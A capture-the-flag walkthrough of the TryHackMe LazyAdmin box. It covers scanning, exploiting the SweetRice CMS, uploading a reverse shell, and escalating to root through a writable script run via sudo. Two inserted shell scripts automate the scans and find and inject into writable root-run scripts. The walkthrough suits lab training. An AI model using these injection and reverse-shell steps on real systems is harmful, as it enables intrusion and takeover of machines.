TryHackMe LazyAdmin Walkthrough

by Vince
in Blog

The description states:  "Easy linux machine to practice your skills" and "Have some fun! There might be multiple ways to get user access."

I thought this one was worth writing up because you have to chain several pieces together to get on the box. I recently saw a scheme that grades capture-the-flag boxes by level. Based on the box description and how I got my low-privilege shell, I would call this one easy.5: it isn't a straight line from one step to the next, and chaining pieces together is more of an intermediate kind of process. That said, maybe there was an easier avenue that I missed? Either way, I really liked the box, so let's kick off with Nmap:

With the TryHackMe platform, I've learned to cycle my Nmap scans. I normally start with --top-ports 1000, then come back in heavy on the ports that turned up, like:

nmap -sV -sT -O -A -p 22,80

The top-ports scan gives me something to work with and the follow-up gives me the details. When the second scan finishes, I run a full -p- scan to pick up whatever else is open, and I might follow that with the heavier flags against just those specific ports. (Note that -A already turns on -sV and -O, so the extra flags on the heavy scan are redundant but harmless.) No matter what box you're working on, you end up waiting forever if you do anything more than a basic scan across all ports. That's fairly real-world, but not something I had seen in cyber ranges before. It's fine, you just have to adjust your method.
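The scan cycle above, written out as an added example (this is not code from the original post). It includes a small parser for Nmap's grepable output (-oG) so the heavy follow-up scan is pointed only at the ports the quick scan actually found open. The target address and the sample report inside the script are constructed placeholders, not real scan data.

```shell
#!/bin/sh
# Added example, not from the original post: the three-stage Nmap cycle
# (top ports -> heavy scan on what was found -> full -p- sweep), plus a parser
# for -oG reports so the follow-up scan only targets open ports.

# Extract open TCP ports from an -oG report as a comma-separated list
# (e.g. "22,80"), which is exactly the form nmap -p expects.
# Ports reported as filtered or closed are dropped.
open_ports_from_gnmap() {
    grep -E '^Host: .*Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]Ignored State.*//' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" { gsub(/^ +/, "", $1); print $1 }' \
    | sort -n -u \
    | paste -sd, -
}

# Run the cycle for real against a target (needs nmap on PATH; -O needs root).
# Stage 1 and 3 write grepable reports; stage 2 is the heavy scan from the post.
scan_cycle() {
    tgt=$1
    quick=$(mktemp); full=$(mktemp)
    nmap --top-ports 1000 -oG "$quick" "$tgt" >/dev/null
    ports=$(open_ports_from_gnmap "$quick")
    if [ -n "$ports" ]; then
        nmap -sV -sT -O -A -p "$ports" "$tgt"
    fi
    nmap -p- -oG "$full" "$tgt" >/dev/null
    echo "all open TCP ports: $(open_ports_from_gnmap "$full")"
}

# Constructed -oG report (not real scan data) so the parser can be exercised
# offline. It deliberately includes a filtered port that must not be listed.
sample_gnmap() {
    f=$(mktemp)
    {
        printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
        printf 'Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, '
        printf '80/open/tcp//http//Apache httpd 2.4.18/, '
        printf '139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)\n'
    } > "$f"
    echo "$f"
}

# Offline demonstration of the parser on the constructed report.
open_ports_from_gnmap "$(sample_gnmap)"   # prints 22,80
```

To use it on a live box, call scan_cycle with the target (scan_cycle 10.10.10.10); the parser is the part worth keeping, since feeding its output straight into -p avoids hand-copying port numbers between scans.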

Moving along...

We find port 80 open, let's take a look:

Fuzzing is another process where I've adjusted my approach on TryHackMe. I would normally lead with Gobuster, but again, it takes too long to complete, so I start with something smaller and quicker and then circle back with a larger wordlist. We start off with Dirb:

We find /content and we investigate:

Lots of references to something called "SweetRice", so I search Exploit-DB:

Excellent, what can we do? 

Searching the recommended directory:

We find a .sql backup file. When we dig into it:

I initially made the mistake of assuming the username was admin. When that didn't work, I came back and realized my error: the username is manager, and we have a hash that we can try to crack with Hashcat:

Excellent! We have the password; now we need to find the login page. While all of this was going on, I was waiting for the fuzzing scan to complete, but I got impatient, so I downloaded SweetRice and tried to install it locally. The install actually broke, but I got the directory structure out of it. I still didn't know where the admin page lived, but I started trying the directories and instantly found:

We toss in the credentials and we get logged in. 

This is where we introduce our second exploit for this CMS:

We "could" investigate the application ourselves, or we could just leverage our credentials and use this exploit. I download it and try to run it out of the box, but it throws errors.

I opt to just hard code my values:

We execute the script:

Excellent, it claims we've uploaded our shell. It's just Pentest Monkey's reverse shell, FYI.

We view the directory as a sanity check:

With our handler set up, we execute our shell:

We clean up the environment and we start looking around:

When we dig into the home directory for "itguy", we find:

The user flag is good, but this backup file is intriguing. We look inside and follow the trail:

So basically, we have a script that executes another script. That second script appears to contain a reverse shell, and it's writable by us.

It's interesting how you find different styles, no different than in the real world. On TryHackMe I've encountered a few boxes that give sudo privileges to www-data, which is something I hadn't seen before. It's definitely not something I would have checked when I first started on this platform, but now I'm accustomed to looking (sudo -l):

Here's where we tie all of this together for root. We could follow suit and echo a reverse shell into that script, but we can leverage what we've already placed on the system:

We echo a line that executes our existing shell into the writable script, then run our sudo command.
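The privilege-escalation check behind this step, as an added example (not code from the original post): given the script that sudo lets us run as root, find which of the scripts it calls are writable by the current user, and append a command to one of them while keeping a copy of the original for cleanup. The wrapper.pl, child.sh and helper.sh names below are hypothetical placeholders built in a temp directory, not the box's real paths.

```shell
#!/bin/sh
# Added example, not from the original post. Models the chain described above:
# a root-run script (the "wrapper") calls a second script, and that second
# script is writable by the low-privilege user, so whatever we append to it
# runs as root the next time the wrapper is invoked via sudo.

# List absolute paths referenced inside a script (crude tokeniser: anything
# that looks like /a/b/c). The shebang interpreter shows up as well, which is
# fine: it is just another candidate that will normally fail the -w check.
referenced_paths() {
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u
}

# Of the paths a wrapper references, print the ones that exist as regular
# files and are writable by the current user. These are the injection points.
writable_targets() {
    for p in $(referenced_paths "$1"); do
        [ -f "$p" ] && [ -w "$p" ] && echo "$p"
    done
    return 0
}

# Append a command line to a writable script, saving a copy of the original
# first so the box can be restored afterwards (the "clean up" step).
append_payload() {
    # $1: writable script, $2: command to append (e.g. a line that launches
    # a shell already staged on the box)
    cp -p "$1" "$1.orig"
    printf '\n%s\n' "$2" >> "$1"
}

# Build a constructed lab in a temp dir: wrapper.pl (what sudo would run)
# calls helper.sh (read-only) and child.sh (world-writable). Echoes the dir.
build_demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho helper\n' > "$d/helper.sh"
    printf '#!/bin/sh\necho child\n'  > "$d/child.sh"
    printf '#!/usr/bin/perl\nsystem("%s/helper.sh");\nsystem("%s/child.sh");\n' \
        "$d" "$d" > "$d/wrapper.pl"
    chmod 444 "$d/helper.sh"
    chmod 666 "$d/child.sh"
    echo "$d"
}

# Offline demonstration on the constructed lab.
lab=$(build_demo)
echo "writable targets referenced by $lab/wrapper.pl:"
writable_targets "$lab/wrapper.pl"
```

On a real box the wrapper path comes from sudo -l; run writable_targets against it, append_payload against whatever it reports, and then trigger the wrapper with sudo. If you are root already, -w is true for every file, so run the check as the low-privilege user you actually have.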

With our handler set up:

We catch the inbound shell, clean it up, and we're root.